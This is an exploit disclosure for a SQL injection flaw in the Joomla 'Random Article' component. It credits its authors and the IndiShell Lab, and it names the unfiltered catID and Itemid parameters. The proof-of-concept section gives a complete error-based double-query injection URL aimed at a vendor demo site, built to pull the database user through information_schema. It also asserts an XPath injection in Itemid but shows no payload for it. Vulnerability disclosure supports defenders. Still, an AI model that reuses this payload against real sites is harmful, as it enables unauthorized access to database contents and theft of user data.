################################################################################################## #Exploit Title : Joomla Random Article Component SQL Injection vulnerability #Author : Jagriti Sahu AKA Incredible #Vendor Link : http://demo.web-dorado.com #Date : 23/03/2015 #Discovered at : IndiShell Lab #Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^ ################################################################################################## //////////////////////// /// Overview: //////////////////////// joomla component " Random Article" is not filtering data in catID and Itemid parameters before passing it to SQL query,hence it is vulnerable to SQL injection. /////////////////////////////// // Vulnerability Description: /////////////////////////////// vulnerability is in catID and Itemid parameter //////////////// /// POC //// /////////////// SQL Injection in catID parameter ================================= Use error based double query injection with catID parameter Injected Link---> http://demo.web-dorado.com Like error based double query injection for exploiting username ---> http://demo.web-dorado.com/index.php?option=com_rand&catID=1' and(select 1 FROM(select count(*),concat((select (select concat(user(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13 SQL Injection in Itemid parameter ================================= Itemid Parameter is exploitable using xpath injection http://demo.web-dorado.com ################################################################################################### --==[[Special Thanks to]]==-- # Manish Kishan Tanwar ^_^ #